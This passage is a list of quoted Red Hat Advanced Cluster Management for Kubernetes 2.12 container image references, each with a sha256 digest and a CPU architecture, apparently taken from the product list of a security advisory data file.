"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:2d8b0b11cf907b25304501a2a62d5551c792c1fb3662ea4cd0e01db724a57b86_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:9abfdfd7491e219d7249800e05298472c4d545687fa7b6c79da71f9414f29d12_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-grafana-rhel9@sha256:c11c8ba588a27d39f1b46bc6b63eebd8e9f9a822917a7638216c7fb93350aaf3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:16710678f62e24a8877350bfdada7b8a533d4abad81984145e31614dc0e64d26_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:88c844cba042e1cd006c3ad413808ad10c4bdb95e8c0fc7b79cec3c3c40882b1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:d32bc1e886821ba104e8b2a5e16dc7b0aa1a01ea927e426ebd264298ac1d66f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f09e16c30c4641612b2306cdbf56f85e31e03028d522597adf2e00f781148254_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:22b747e9952ede6b831297b64684acaafaf3e12998d6872081a08ae39b52c87b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:5d368764b9745d9a977bde3c4cd2faac1a344aea716ce626a0904b7da80f5267_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:8deed2b9ade0bc7ab30fd93d165fc1a8e18caab7b4af1d1b2b326dc93570c498_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:b68a3a1fe74bc4b319859874ca19a4e35c72174afc6a2af08e4bd7b64898d27f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
